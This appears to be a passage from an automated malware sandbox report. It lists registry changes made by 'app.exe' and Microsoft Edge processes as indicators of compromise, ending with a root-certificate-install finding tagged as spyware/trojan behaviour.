Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	app.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c18a5d954638d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e2b231964638d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "x1ijinv"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658BE = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d809ffc04838d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000056945e3ac0b9732d98b56562437eabfdfeef760fd4366e39458eeb3ef303fa7fdf2e2bf52b0ab2255a643ef893f0c9bc7770c40dfe02ec7fe93c3e052cd8	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{52DC45B1-0247-4D9B-8D81-ADDF459285F0} = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000002a4401f844fabb3a70023c2de7625b750ad20e0f9be0ef38f9a0caae959b70a949f7fbc01b0131d10f8fb2184ae1c624a5f7362c45906fd0f73256c5ae06f5d50d5715d87301a7f0c52f21da7120589133dabaad5808457ab9697cb06982dfef0084b635b899b31f8d04fe985fc04512a6998119d1e956fd5065ae1fd3aef9de4a9e2837e56b92ff142f52c48761b0982e5686bc39d4ad1371460ff51c2ce9c853c5ac1a831680e427ce2b9d99a384f6852fc2cee467660cd32b5f69679b209b6d194845983a42fa93024928b126783b7f46cd604f44d7f68536e57efa9af6b653ba6b5ddf778dfcaeeb90a4ba8a9f1c87b974207109b0627086dbc673cb8c9e6ac8e330856d787b34aab9695370f7723eaaa8e2e35795af173baf776ccd77ba5c63926f04bc7bb51b5d17dc2c76acc0bb37190c32cfbfe9617514cfa03f6f2845ab383468043ff7b725e538163d88d13d8298bafd0f7539ba5377c818c30da1a4c0bb5972e5879a41237db0e465ab6183a913ca74b9eadfe2f7d21d61f84a6bf9c29ea750ffe9873775e2d6ba8eb6d76cce44a3776b77c81fc6f8c9d133271ce4a02ded3e96	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = c098609c705bd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f